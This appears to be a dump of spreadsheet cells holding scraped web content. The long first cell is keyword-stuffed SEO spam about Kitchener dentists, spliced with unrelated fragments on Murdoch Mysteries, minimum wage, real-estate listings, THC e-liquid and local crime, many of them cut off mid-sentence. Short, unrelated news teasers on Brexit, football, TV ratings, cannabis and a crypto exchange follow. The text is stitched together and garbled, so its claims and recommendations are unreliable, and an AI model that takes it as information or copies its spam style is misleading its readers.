William Murdoch, a detective in the Toronto constabulary with an interest in using then-unorthodox/unknown forensic techniques for catching criminals. The debate on a $15 minimum wage is back in the spotlight. As business owners, we believe it’s past time for a $15 minimum. Number 1 Dentist Near Kitchener KITCHENER — A disturbance near a Kitchener high school left. personal property before the altercation ensued. One. Purplebricks invites you to discover your future House located in Niagara Falls, 6984 Margaret Street. Ask our experts or the owner directly for more information. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you Go Let us help you find the perfect dentist Go Best of 2019 – Dentists in Kitchener, ON. Bike stop leads to drug, weapons charges – KITCHENER – A 48-year-old Waterloo man is facing a number of charges after a bicycle stop on Monday. Police say they stopped. Murdoch Mysteries is a Canadian detective series set in late nineteenth- and early twentieth-century Toronto, based on a series of novels by Maureen Jennings.The series centers around William Murdoch, a detective in the Toronto constabulary with an interest in using then-unorthodox/unknown forensic techniques for catching criminals. Tips to finding Kitchener ON dentists Get to know your dentist: The best way to find a new dentist in Kitchener ON is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time poking. Purplebricks invites you to discover your future House located in Windsor, 929 St. Paul Avenue. Ask our experts or the owner directly for more information. With recreational marijuana becoming legal in more and more places around the world, the herb’s popularity has seen a recent surge. For those who enjoy the herb’s benefits, but are leery of the health repercussions of smoking, there are safer alternatives available — one of which is THC e liquid says this study from Escape E-cigarettes. Liquid THC is a tincture, which means it is a. A number of schools. which occurred near the grounds of Ressurection High School. Police arrested a 15-year-old in. Tips to finding Fairway Plaza Kitchener ON dentists Get to know your dentist: The best way to find a new dentist in Fairway Plaza Kitchener ON is to get to know them personally before you require dental care – we are talking about someone who. Blu cigs are they safe? Blu electronic cigs acquired by Lorillard inc the third largest tobacco company. Blu e-cig, one of the most popular vapes out there and Glasglow Street. (Waterloo Regional Police/Twitter) One person has been taken to hospital after a stabbing in Kitchener. Near-record homes sales in Kitchener-Waterloo in September: KWAR – Homes in the Kitchener-Waterloo market were changing hands at near-record pace in September. This marks the highest number. Top Dental Clinic In Kitchener Ontario Locate and compare Dental Clinics &amp; Centres in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Dental hygiene care is the service offered by this dental hygienist and her associates at their clinic located in Kitchener, Ontario. Patients of all ages are welcomed by the family oriented team. All aspects of dental hygiene care and treatments are discussed with patients by the team with a view to helping them enjoy long term dental and oral health. Helping patients of all ages achieve and maintain beautiful smiles and long term oral and dental health is the goal of the team at this clinic located at Kitchener in Ontario. Safe and effective procedures are used to ensure that the dental expe. Regardless of the question, Singh took every opportunity to repeat his favourite theme: that Liberals and Conservatives alike. The Best Dentists in Kitchener Handpicked Top 3 Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence.You deserve only the best! Best of 2019 – Dentists in Kitchener, ON Here is the definitive list of Kitchener’s dentists as rated by the Kitchener community. These dentists have received great reviews from customers and are currently accepting new patients. While working at a clinic in Guelph, Ont., a colleague told Tanase that hygienists were. "I can’t accept this as a person. The bird, a pigeon, was found on a bridge in downtown Kitchener in September. legs were banded with racing tags and was. Two other dental hygienists lost licences at same dentistry for treating partners, docs show – KITCHENER – A Guelph-based dental hygienist who lost his licence for cleaning his wife’s teeth is one of three at the same. Find the Top Dentists in Kitchener, ON Enter your location so we can match you with dentists near you Go. Established dental clinic centrally located in downtown Kitchener with over 35 years serving Kitchener-Waterloo families. We would love. Top Dental Clinic of 2019 in Kitchener/Waterloo 655 Fairway Road S Kitchener, Ontario N2C 1X4 Call Directions Website View Full Profile Ambrosia Pastry co. Top Choice Pastry Shop of 2019 in Kitchener/Waterloo 150 Roger St. Kitchener, Ontario N2J. The hacker who targeted the Toronto dental clinic told CBC News he was not involved in the recent cyberattacks on the Ontario. KITCHENER, Ontario – A Canadian man who worked as a dental hygienist said his license was revoked for five years and he was . Cosmetic Dentist In Kitchener The Best Cosmetic Dentists in Kitchener Handpicked Top 3 Cosmetic Dentists in Kitchener, ON. They face a rigorous 50-Point Inspection, which includes everything from checking reviews, ratings, reputation, history, complaints, satisfaction, trust and cost to the general excellence.You deserve only the best! Highest Rated Dental Clinic Near Kitchener Friendliest Dentist In Kitchener Ontario Businesses finding a better way forward – The debate on a $15 minimum wage is back in the spotlight. As business owners, we believe it’s past time for a $15 minimum. KITCHENER – A Guelph-based dental hygienist who lost his licence for cleaning his wife’s teeth is one of three at the same. "The ministry is aware that the College of Dental Hygienists of Ontario has submitted a proposed. wife’s teeth because of. ‘I just want it to end’: Dental hygienist who lost license for treating his wife speaks out – KITCHENER – A former Guelph dental hygienist. into his conduct following a complaint to the College of Dental Hygienists. Simply Delicious – Restaurant in Kitchener, ON – 300 King Street East, Kitchener, Ontario. Simply Delicious Reviews April 10, 2018 Carol 5 Star rating! They have the friendliest and most accomodating staff. Their Schnitzel is humungous and. Cosmetic Dental Clinic In Kitchener Dentist Kitchener – Kitchener Dental Clinic Kitchener dentists, Dr. Tabita Ilitoi , Dr. Roxana Ghergari, Dr. Farvah Sayyad, Dr. Sorin Mitrana &amp; Dr. James Chacko , offer comprehensive dental treatment for numerous conditions. Stoke-on-Trent’s oldest dental practice is set to reopen next month (November) under new ownership. AR Fee Dental Practice, cosmetic dentist in Kitchener. More Related Videos New Patients Welcome If you need a Kitchener dental clinic to take good care of you and your family, contact us today. Our Values Station Dental 286 Duke Street West Kitchener ON N2H 3X8 Phone. However, with the growing number of clinics in these regions and availability of quality dental services at relatively lower. Best Dentist Near Kitchener Search or browse RateMDs for trusted reviews &amp; ratings on Dentists in Kitchener. We're the original doctor ratings site with over 2 million reviews. The staff used to be good and reasonable about 6 years ago. Now the front staff is. Number 1 Dental Clinic Near Kitchener Woman saves purse from snatchers in Manimajra – Shalini Modi, a resident of Manimajra, said she was going to a dental clinic near her house at 6pm. As she reached near gate. New NHS dental practice opens in Billingham – After 21 months of campaigning to increase the number of NHS dental places in the North East town, patients, local. Locate and compare Dental Laboratories in Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Please enter what you're searching for Please enter. Our Dental Emergency Clinics specialize in providing excellent emergency care to Kitchener and Waterloo area. Many dental problems need to be addressed immediately to prevent the condition from worsening, which is why an emergency dental clinic. Locate and compare Dentists in Williamsburg Town Centre Kitchener ON, Yellow Pages Local Listings. Find useful information, the address and the phone number of the local business you are looking for. Thoughts of going to a dental clinic usua. However, with the increasing number of clinics in these countries and the availability of quality dental services at. Friendliest Dentist Near Kitchener Kid Friendly Dentist Near Kitchener Our pediatric dentists work with all types of kids. We provide a special program for autistic children that uses familiar routines for increased comfort. Preferred Dentist Near Kitchener Ontario Drew Monkman. Best Dentist in Halton Hills RSS Friendliest Dentist In Halton Hills Number 1 Dentist Near Halton Hills Ontario Kid Friendly Dental Clinic Near Halton Hills Equiniti is the UK’s leading provider of share registration services and associated. 3 reviews of Sierra Springs Dental "These Guys are Incredible! I went in to book an appointment about 3 months ago, After years of neglect and avoiding a Dentist the time finally came to ' get a check up '. I look up reviews online. Best Dentist in Kitchener No Widgets found in the Sidebar Alt! No Widgets found in the Sidebar Alt! Dentist Cosmetic Dentist Near Kitchener February 1, 2019 The dental implants and prosthetics market is anticipated to grow with a significant. Holiday Brief: The final sprint – He will be joined by Liberal candidate for Kitchener—Conestoga Tim Louis and other candidates from the region. Finally, . has a 4.8 rating. I'm new to Waterloo and had this office recommended. It exceeded my expectations and I had a great experience. Everyone was so friendly and appointments were right on time. Dr. Morrison has been our family dentist. How to Make Your Local SEO Efforts More Effective? – In case you have a web page about finding dental clinics near me, you get more chances of being ranked for the particular phrase. 4. Last but not least, as most of the users use mobile devices for. The service side has also seen changes: Darryl Haus, maître d’ of. in box near the middle of the main building. The Bloom. Number 1 Dentist In Kitchener Ontario Find the best Dentist in Kitchener, ON. Discover Dentists real customer reviews and contact details, including hours of operation, the address and the phone number of the local Dentist you are looking for. Province approves safe consumption site for Kitchener, Ont. – Health Minister Christine Elliott says the new site will address opioid addiction in Kitchener. in Ontario, and the first. Number 1 Dentist In Kitchener Ontario Very kind, patient and knowledgeable dentist! I believe she makes things as affordable as possible for families and even did a small job pro bono for my daughter a few years ago. Locate and compare Dentists. Healthcare jobs in Canada hiring NOW! See latest positions in the healthcare, wellness and senior living hospitality. Maxwell Management Group Canada. Best Dental Clinic In Kitchener Ontario OHIP+ Changes. The Ontario public drug program changed on April 1, 2019.; Ontario residents 24 years and under, covered by OHIP and a private plan with prescription drug coverage, are no longer eligible for OHIP+.; Submit your drug claims incurred on or after April 1, 2019 to your Health Plan insurer for reimbursement.; Click here to find out more. Find great local, shopping and travel deals at 50 to 90% off in Kitchener, ON. Three Yoga or Pilates Classes or Unlimited Yoga and Pilates Classes at Midtown Yoga (Up to 83% Off). Admission for One or Two to Bingemans Screampark (Up to 42% Off). C$15 for C$30 Worth of Lindt Chocolate at Lindt &amp; Sprüngli Canada . 2019-10-11 · Seeking a full-time or part-time Small Animal Veterinarian to work in a suburban area east of Buffalo, NY. Experienced as well as Cambridge Centre Dental has the friendliest staff, the most up to date and professional dentist I ha. ve ever met and very fair pricing. If you are looking for a new dentist, I would suggest you talk to them first. See More</t>
  </si>
  <si>
    <t>The theatre company says it “cannot ignore” the “strength of feeling” against its sponsorship deal. Read more? Click here</t>
  </si>
  <si>
    <t>From the workers at Royal Randwick to the racegoers themselves, a huge amount of effort goes into making sure we have everything ready ahead of a major race day. With only a week to go before the TAB Everest gets underway, the Racing Dreams team went to experience just what goes into getting race day ready. Image: News Corp Australia</t>
  </si>
  <si>
    <t>Lindora Makes Major Capital Investment – Expands Body Contouring Services Original Source Lindora, one of the largest medically supervised weight loss and wellness companies in the country, announced today that it has made a major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Lindora Makes Major Capital Investment – Expands Body Contouring Services appeared first on Sky-News. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>Not woke. Via ABC News: A Virginia high school teacher who was fired for refusing to use a transgender student’s preferred pronouns has filed a lawsuit against the school district. Officials at West Point High School, about 40 miles east of Richmond, cited nondiscrimination and anti-harassment policies in December when it terminated French teacher Peter […]</t>
  </si>
  <si>
    <t>His playing was intuitive, complex, polyrhythmical – and usually thunderously loud.</t>
  </si>
  <si>
    <t>Alex Finnis</t>
  </si>
  <si>
    <t>Pep Guardiola's team have been accused of tactical fouling by several high profile figures - but is there any truth in it? The post Are referees clamping down on Manchester City’s ‘tactical fouling’? A statistical analysis appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Uniquely situated in a stunning and secluded part of St Lucia that’s only accessible by boat, Marigot Beach Club and Dive Resort is nestled in lush tropical rainforest overlooking one of the most beautiful and exotic bays in the world. From the veranda of your studio or villa you’ll enjoy spectacular St Lucian sunsets, and […] The post Marigot Beach Club and Dive Resort – St. Lucia appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/waHYDN0v5Xk/257616-et-deals-dell-poweredge-t30-quad-core-server ET Deals: Dell PowerEdge T30 Intel Xeon E3-1225 Quad-Core Server for $299 If you’re in the market for an affordable server, today’s sale from Dell will definitely catch your eye. For a limited time, you can grab one of Dell’s PowerEdge T30 mini tower servers with a massive discount. • Dell PowerEdge T30 Intel Xeon E3-1225 Quad-Core Server for $299 (Coupon code: FallT30) Inside, this server sits a quad-core Intel Xeon Processor E3-1225 v5 clocked at 3.3GHz. This processor offers solid performance, and it has an integrated Intel HD Graphics P530 GPU. As a server, this system comes with 8GB of DDR4 ECC UDIMM memory to improve stability and prevent data loss, and it has a 1TB 7,200RPM hard drive. The system is covered by a one-year basic hardware warranty. In addition to being marked down from $788 to $299, you can also add free shipping on top of the already hefty discount. This model doesn’t come with an OS installed, but you can easily grab a top-notch Linux server distribution like CentOS or Debian to get up and running quickly. Windows Server is obviously much more expensive, but if you’re using Windows-based third-party software, you can grab a copy of Windows 10 Pro for only $133. Note: Terms and conditions apply. See the Dell site for more information. For more great deals, head over to TechBargains. Source: http://feedproxy.google.com/~r/ziffdavis/extremetech/~3/waHYDN0v5Xk/257616-et-deals-dell-poweredge-t30-quad-core-server The post ET Deals: Dell PowerEdge T30 Intel Xeon E3-1225 Quad-Core Server for $299 appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>'If anyone is watching and needs a friend please reach out... we will be there and we will hold your hand' The post Labour MP Rosie Duffield opens up about being victim of domestic abuse in emotional Commons speech appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>You can't win a grand final during the week, but you can certainly lose one. Thankfully the Roosters and Raiders have the right men in charge to nail it.</t>
  </si>
  <si>
    <t>budgetworkwear</t>
  </si>
  <si>
    <t>Personalise your Bisley workwear, get your Name Embroidered for Free when you buy any Bisley 3 Pack Shirts &amp; POlos. That is a saving of $7.70 each shirt. Have more employees, not an issue, please provide all the names and we will do them for Free. Terms &amp; Conditions of Offer Personal Name Embroidery will be done in Black or Navy Colour in standard font and height of 1cm. Not valid for company names unless it is a standard text of height 1cm Offer Not valid for Logo embroidery, please see options for logo embroidery https://www.budgetworkwear.com.au/collections/decoration Offer ends Sunday 20/10/19 Cant be used with any other offer Names have to be provided with sizes in the comments field or can be emailed to us.</t>
  </si>
  <si>
    <t>GOLFTV is now a national partner of the PGA of Canada and will also be a supporting partner of the RBC PGA Scramble, the national series of events taking place at more than 175 golf facilities around the country and culminating with the national finals now taking place at Cabot Links and Cabot Cliffs. “On […]</t>
  </si>
  <si>
    <t>I know half the world thinks Gwyneth Paltrow is a solipsistic, uber controlling, chickpea juice-blending lunatic, but I really like her.</t>
  </si>
  <si>
    <t>Players in the fashion industry reveal how sustainability and ethics will shape their business this spring.</t>
  </si>
  <si>
    <t>Oswald Gruebel, who led both of Switzerland's two biggest banks during his career, criticised negative interest rates and argued they'd lead to a further decline of the country's financial sector.</t>
  </si>
  <si>
    <t>Carrie Fellner</t>
  </si>
  <si>
    <t>The ruling is likely to affect drug testing in workplaces across the state.</t>
  </si>
  <si>
    <t>A Jamie Maclaren hat-trick has left Australian coach Graham Arnold with a selection headache as the Socceroos eye their next target on the qualifying road to Qatar.</t>
  </si>
  <si>
    <t>Roger Jenkins, on trial over Qatar dealings, was recorded criticising ex-CEO John VarleyA former Barclays boss accused his ex-chief executive John Varley of being a “wally” for refusing to raise investor fees and warned colleagues that Qatari investors may pull out of the bank’s emergency fundraising in 2008, a court heard.Roger Jenkins, a former head of the lender’s investment banking business, told a colleague they would see Varley’s “shit turn white” if Qatar walked away. Continue reading… Read More</t>
  </si>
  <si>
    <t>Rising star of English ballet Precious Adams on unwittingly opening up a debate around colourism. Read more? Click here</t>
  </si>
  <si>
    <t>Human rights advocates say the Queensland government's plan to fast-track laws to jail activists who lock themselves to concrete drums will erode the public's right to peaceful protest.</t>
  </si>
  <si>
    <t>Amina Art Ansari, whose paintings hang in Windsor Castle, has set up an art studio in Islamabad where she uses art therapy to help her students. Read more? Click here</t>
  </si>
  <si>
    <t>When it comes down to it, sport is an industry, with profits to protect and waste to dispose of.</t>
  </si>
  <si>
    <t>More pandering.</t>
  </si>
  <si>
    <t>Now the footy is over, it's time to get back to basics.</t>
  </si>
  <si>
    <t>A new survey suggests Canadians are warming up to cannabis dispensaries near their homes. Online real estate company Zoocasa found that 43 per cent of respondents to their survey agreed they would be comfortable with such a business operating in proximity to their home compared with 31 per cent last year. “However, those who don’t own real estate in their neighbourhood were more likely to indicate they are comfortable – a total of 56 per cent of renters were in agreement, compared to just 36 per cent of homeowners. As well, respondents who identified as millennials (born between 1981 and 1996) were most comfortable with nearby dispensaries than older generations; 56 per cent indicated as such, compared to a combined 34 per cent of generation Xers (1965 to 1980) and baby boomers (1946 to 1964),” said Zoocasa. “As well, Canadians aren’t too worried that the presence of a dispensary would hurt the value of nearby homes, and overall sentiment appears to have improved from pre-legalization. A total of 32 per cent of respondents felt that dispensaries would have a negative impact on nearby home values, down from 42 per cent last year. Homeowners were more likely to agree with the sentiment, at 35 per cent, compared to 25 per cent of renters. Again, millennials are less likely to be concerned, with 24 per cent in agreement, compared to 38 per cent of older generations.” The survey also found: More than half of both homeowners (64 per cent) and renters (53 per cent) agree that smoking cannabis inside would devalue a home. Landlords strongly prefer that cannabis not be grown or consumed within their properties – 85 per cent of respondents who identified as owning rental properties agreed they would rather have tenants who did not engage in such behaviour. As well, now that cannabis is legal, they have become increasingly concerned about related damage to their properties, with 57 per cent in agreement. Fifty-five per cent of landlords said they would consider charging higher rents to future tenants to cover potential cannabis-related damages. Mario Toneguzzi is a Troy Media business reporter based in Calgary. © Troy Media The views, opinions and positions expressed by columnists and contributors are the author’s alone. They do not inherently or expressly reflect the views, opinions and/or positions of our publication. The post Concern over nearby cannabis stores fading: survey appeared first on West-Central Cross Roads.</t>
  </si>
  <si>
    <t>Arabic Romanian Dictionary – travel dictionary to translate Arabic to Romanian. Click on the list to show Arabic or Romanian synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Romanian Dictionary →</t>
  </si>
  <si>
    <t>Welcome to Redcliff Family Dental and thank you for choosing us as your Family Dentist! We are a locally owned family practice that that truly cares about the people we meet. We have an incredible team of hard-working and friendly staff who look. 2019-10-12 · Chatham Daily News – a place for remembering loved ones; a space for sharing memories, life stories, milestones, to express condolences, and celebrate life of your loved ones. For over 20 years, Medicine Hat Denture Clinic, along with Rainy Deis, DD and her friendly team have been honored to serve the people of Medicine Hat and surrounding areas to achieve that perfect smile. Schedule your consultation today. Top Dental Clinic In Medicine Hat Tips to finding Medicine Hat AB dentists. Get to know your dentist: The best way to find a new dentist in Medicine Hat AB is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time poking around your mouth with metal instruments, Use Distance Search to find Ads based on where you are and how far you want to travel. Location (postal code or address): Search radius km . Increase the search radius for more results. Based on the radius, a new location list is generated for you to choose from. Best Dentists in Medicine Hat, AB – Courtyard Dental Centre, Crestwood Dental Clinic, Southside Dental, Sun City Dental, Dr. Brenda Krasko Family Dental, River Dental, Grover Dental Centre, Schow Dental, Park Meadows Dental, Galvin Dental. Your Dentist in Medicine Hat from the clinic's opening in September 2000, the incredible team at Grover Dental has been providing the families of Medicine Hat and its surrounding areas with gentle, friendly and high quality dental care. Our. Friendliest Dental Clinic In Medicine Hat Denture Care Ltd is a full-service denture clinic based in Medicine Hat, Alberta. Since 1997, we have been providing a wide range of dentures and denture repairs. Dentures not only enhance your look and confidence, but also improve your ability. Austin Health Center in Trenton to reconfigure unused space to create two new dental exam Password requirements: 6 to 30 characters long; ASCII characters only (characters found on a standard US keyboard); must contain at least 4 different symbols; Get a list of Canada Post Community Foundation grant recipients since 2009, how much they received and for what project. River Dental – 378 1 St SE # 1, Medicine Hat, Alberta T1A0A6 – Rated 5 based on 18 Reviews "Long rant but I have to! My family has been with this clinic. Tips to finding Medicine Hat AB dentists Get to know your dentist: The best way to find a new dentist in Medicine Hat AB is to get to know them personally before you require dental care – we are talking about someone who spends a lot of time.</t>
  </si>
  <si>
    <t>Tanya Plibersek says Labor's climate debate is a 'very healthy' discussion to have following its federal election loss.</t>
  </si>
  <si>
    <t>HM Government</t>
  </si>
  <si>
    <t>PM Boris Johnson made a statement on his new Brexit deal in the House of Commons.</t>
  </si>
  <si>
    <t>Your baby isn’t manipulating you with their behaviour: they are simply doing what they are meant to be doing in order to ensure their survival.</t>
  </si>
  <si>
    <t>Keep reading this article on NFL Gridiron Gab. Ravens posted a video and story on their website disputing that cornerback Marlon Humphrey choked Browns star Odell Beckham Jr. in Sunday’s loss, the</t>
  </si>
  <si>
    <t>The Masked Singer has again landed on top of the Reality TV heap. 10 strategically split-coded the show into two parts, but still came out on top. The bulk of the show drew 835,000 and it rose to 1.07m for the reveal of Nikki Webster as the Alien (despite her denying all participation last week). It also topped the demos. The Block was in second place at 806,000 then 7:30 (596,000), The Real Dirty Dancing (580,000) and Australian Story (537,000). 10’s luck continued with Have You Been Paying Attention? strong at 819,000, winning against Four Corners (489,000), Media Watch (439,000 from 9:20pm), This Time Next Year (437,000) and Secret Bridesmaids’ Business (317,000 from 9pm). It was another close battle between Today and News Breakfast. Nine network won Monday, just, with 26.2% then Seven 26.0%, 10 23.1%, ABC 17.1% and SBS 7.5%. Nine News (870,000 / 836,000) was best for Nine then A Current Affair (794,000). Hot Seat drew 427,000 / 268,000. Later a 20 to ONE repeat was 119,000. Seven News won its slot with 1.02m / 1.02m then Home and Away (656,000) and The Chase (600,000 / 386,000). SWAT was 139,000. The Project was 492,000 / 327,000 then 10 News (371,000), First Just for Laughs (383,000) and Celebrity Name Game (234,000). ABC News (652,000), Q&amp;A (261,000) The Drum (186,000) comprised ABC’s remaining night. On SBS it was How the Victorians Built (231,000), Britain 24 Hours in Emergency (158,000) SBS World News (156,000) and Let’s Talk About Sex (115,000). Bluey again topped multichannels at 153,000. Sunrise: 270,000 Today: 188,000 News Breakfast: 130,000 / 45,000 OzTAM Overnights: Monday 30 September 2019</t>
  </si>
  <si>
    <t>Another nod to the legacy of the great Reg Watson…. Wentworth fans will be able to check out Turkey’s adaptation of the Foxtel hit from Friday after reports Netflix has picked up the worldwide rights to the series. Netflix inked the deal for Avlu with Fremantle, who produce the original Australian. Netflix also screens Wentworth in multiple territories. Adaptations were also made in Germany, Belgium and the Netherlands. Avlu has been a ratings hit since its launch on Turkey’s Star TV in March 2018. The second season, which wrapped in May, drew a peak audience of 3.8 million viewers for the channel. Season three is set to premiere in Turkey later this year. Meanwhile Wentworth is due to go before cameras again shortly in Melbourne, with Foxtel confirming the final 20 episodes to play out across two more seasons. Source: Hollywood Reporter</t>
  </si>
  <si>
    <t>Late Friday morning has seen an update on the Manchester United site, with Ole Gunnar Solskjaer reflecting on the injury and fitness issues he now faces for Sunday. The update...Late Friday morning has seen an update on the Manchester United site, with Ole Gunnar Solskjaer reflecting on the injury and fitness issues he now faces for Sunday. The update... You can click here to read the full article. The post Friday late morning official Manchester United injury/fitness update for Newcastle: Ole Gunnar Solskjaer appeared first on NUFC The Mag.</t>
  </si>
  <si>
    <t>You &amp; I - Suitcase Stories is OUT NOW on Spinnin' Deep! Like this track? Download on Beatport or add it to your favourite Spotify/Apple Music playlist by clicking HERE: https://spinnindeep.release.link/suitcase-stories!YT Valerie and Mik decided to quit their jobs, sold everything they owned: their house, their car, their furniture and personal belongings to travel around […] The post You &amp; I – Suitcase Stories (Official Music Video) appeared first on Dubster.</t>
  </si>
  <si>
    <t>Global – October 5, 2019 – ( Newswire.com ) Apollo Foundation is announcing the launch of Apollo Decentralized Exchange (DEX), a proprietary software package for the exchange of digital assets in peer-to-peer networks. The beta version features atomic swaps, which is smart contract technology that enables the exchange of different cryptocurrencies without the need for intermediaries or third parties. Unlike traditional exchanges, Apollo DEX does not have a central entity or guarantor of transactions. Digital assets are transferred directly from sender to recipient without the involvement of outside parties. The beta version will collect feedback from users to optimize the platform. “Apollo DEX is one of the safest ways on Earth to trade crypto. Unlike nearly all ‘decentralized’ exchange platforms that still have the ability to freeze assets, take funds and implement KYC, the Apollo DEX has no governing entity. Trades are accomplished through atomic swaps and do not require a central entity. The Apollo Foundation does not keep it running, regulate it, control it or profit from it in any way. Apollo DEX is hosted and powered by its users, designed by its users and only its users (forgers) will profit,” says Steve McCullah, director of business development. Atomic Swap Technology “Atomic swap technology ensures the execution of transactions between unrelated blockchains without the participation of intermediaries,” says Daniel Korogodski. “The transaction is ensured under the condition that each party fulfills its part of the contract.” Atomic swaps enable each party to participate in a transaction with a contract — a separate contract for each blockchain. A contract with settlement terms is created in the Apollo blockchain. The corresponding smart contract is created in the Ethereum blockchain. Apollo DEX “Apollo DEX is one of the first platforms utilizing a truly decentralized architecture,” says Steve McCullah, director of business development. “It will give its users unprecedented control and security over their funds. We have experienced exchange hacks and unscrupulous fund freezing first hand and this experience has fueled Apollo’s mission to provide an unadulterated exchange experience. Z .mm Developers are focused on making Apollo Decentralized Exchange secure, efficient, and convenient. Here are other features of the platform which distinguish it from other exchanges. TradingView is a graphical representation of the change in price ratio of two assets. Thus, a user can quickly assess the market and carry out transactions. TradingView’s graph and tools will be included in the Exchange section of Apollo web wallet. Apollo Nodes on Ethereum: Apollo Dex’s own Ethereum nodes have been deployed for safe and controlled interaction with the Ethereum blockchain. This allows the system to bypass using third-party services to interact with the Ethereum blockchain. Thus, communication with the ETH network becomes reliable, safe, and fault-tolerant. Matcher is an automated algorithm that finds complementary orders and carries out transactions as soon as possible. Verification is done after the placement of each order. Ethereum Smart Contract: The platform uses Ethereum smart contracts to create and execute orders with additional conditions and rules. This allows the transfer of funds with confirmation from the recipient. A time limit is set for the entire procedure. For updates, visit Apollo Foundation: Website: www.apollocurrency.com Medium: medium.com/@apollocurrency Videos: YouTube Twitter: @ApolloCurrency Telegram: @apolloofficialannouncements Contact: info@apollocurrency.com | pr@apollocurrency.com Press Release Service by Newswire.com Original Source: Apollo Foundation Launches Decentralized Exchange With Atomic Swaps Copyright © The Associated Press. All rights reserved. This material may not be published, broadcast, rewritten or redistributed. ×</t>
  </si>
  <si>
    <t>The Blue Mountains retreat built in 1876 for John R. Fairfax has come onto the market.</t>
  </si>
  <si>
    <t>Turkish ground forces pressed their advance against Kurdish fighters in northern Syria on Thursday, Turkey’s Defence Ministry said, launching airstrikes and unleashing artillery shelling on Syrian towns and villages the length of its border. CBC | World News</t>
  </si>
  <si>
    <t>GOOGLE Pixel 4 has been plagued by leaks ahead of its full unveiling in the sprawling city of New York next Tuesday, October 15. The latest of which suggests the American firm could be hard at work on a 5G version of the handset. Daily Express :: Tech Feed</t>
  </si>
  <si>
    <t>Time is running out for the Prime Minister to agree a Brexit deal with EU leaders before the deadline imposed by MPs</t>
  </si>
  <si>
    <t>Messi says tax problems made him want to leave Barcelona Lionel Messi has admitted he wanted to leave Barcelona when he was under investigation from the Spanish tax authorities but insists now he intends to finish his career at the club. In an interview with Catalan radio station RAC1, Messi also said he had expected Neymar to sign for Real Madrid last summer after Barca failed to strike an agreement with Paris Saint-Germain. Messi and his father Jorge were found guilty of defrauding Spain of 4.1 million euros in taxes between 2007 and 2009, for which they paid close to 10 million euros and Messi was handed a 21-month suspended prison sentence. Asked on Tuesday night if he had ever wanted to leave Barcelona, Messi said: “In 2013-14, when I started having the tax problems, it was very difficult for me and my family.” “My children were young and we had a very bad time. At that time, I had it in mind to leave, not because I wanted to leave Barca but because I wanted to leave Spain. I felt mistreated and I didn’t want to be here anymore.” The 32-year-old’s current contract expires in 2021 and Messi believes extending his deal “will not be a problem”. “Today it is clearer that my idea is to finish here,” Messi said. “For how I am at the club, for what I feel, and for the family and the children and how settled we are in this city. I would not like to disrupt that. “Of course anything can happen but in principle, the idea is to stay here.” Messi began playing football aged six for Newell’s Old Boys, the Rosario club he supports in Argentina. “I always dreamed of being able to play again for Newell’s and to have the experience of playing football in Argentina,” he said. “But I have already told them that sometimes you have to think about what is best for your family.” Messi was keen to be reunited with Neymar last summer but Barcelona were unable to agree a fee with PSG. “I honestly thought at one time, especially in this market, that if he did not come here, he would go to Real Madrid Madrid because I thought he wanted to leave,” Messi said. “I wanted Ney to come because as a footballer, he is one of the best in the world. He is unpredictable, different and having him in our team would have given us more options.” Barcelona did sign Antoine Griezmann from Atletico Madrid, despite him rejecting the Catalans the year before. Messi denies suggestions of a rift between him and the Frenchman. “The first year when we wanted to sign Griezmann, I said he was one of the best and that the best are always welcome,” Messi said. “I have never had problem with him coming. So it’s a lie.” Messi also offered his support to Barcelona coach Ernesto Valverde, who has been under pressure after a bumpy start to the season followed the team’s Champions League collapse against Liverpool in May. “It was not the coach’s fault but it was also not my decision for him to stay,” Messi said. “The club decided Valverde would continue and for me that was a joy, good for stability and he is a coach we support and love. “If another coach comes, we will be with him. To achieve success, we all have to be united.” Messi scored his first goal of the season in a 4-0 thrashing of Sevilla on Sunday, after two months spoiled by calf and thigh injuries. “I’m still a bit short but I’m feeling better,” Messi said. “My legs hurt against Sevilla but it’s what happens when you come back. I’m getting closer.” This post Messi says tax problems made him want to leave Barcelona appeared first on FootyNews.co.uk. Posted by The Gaffa. FootyNews.co.uk - Updated Daily Football News From The Top 5 Leagues In Europe</t>
  </si>
  <si>
    <t>This is possibly more moderne than Deco. A house off the A 711, just south of Kirkcudbright in Dumfries and Galloway. It’s possibly very recently built.</t>
  </si>
  <si>
    <t>Jessica Irvine</t>
  </si>
  <si>
    <t>For more than a decade, Australians watched in puzzlement as the world unleashed a strange armoury of unconventional policies. Now it's our turn.</t>
  </si>
  <si>
    <t>Out now from Markosia on DriveThruComics! Flip Vol. 2 #1 Creator and monster are flipped in the latest digital issue of the Flip anthology. Source: Flip Vol. 2 #1 on DriveThruComics! – Markosia The post Flip Vol. 2 #1 on DriveThruComics! – Markosia appeared first on 3 Million Years.</t>
  </si>
  <si>
    <t>From Boris Johnson's first Tory conference as PM to a proposed plan, here's what happened last week. The post Johnson plans to ‘get it done’ – Last week in Brexit appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Environment Minister Matt Kean said he would instead introduce a discussion paper on plastics before the end of the year.</t>
  </si>
  <si>
    <t>jim518</t>
  </si>
  <si>
    <t>The price is same as the dummy camera. PLEASE NOTE THIS UNIT WITHOUT POWER SUPPLY.</t>
  </si>
  <si>
    <t>The advisory firm will work with the AI company to identify how to integrate solutions into a clients' business. Read More</t>
  </si>
  <si>
    <t>keila</t>
  </si>
  <si>
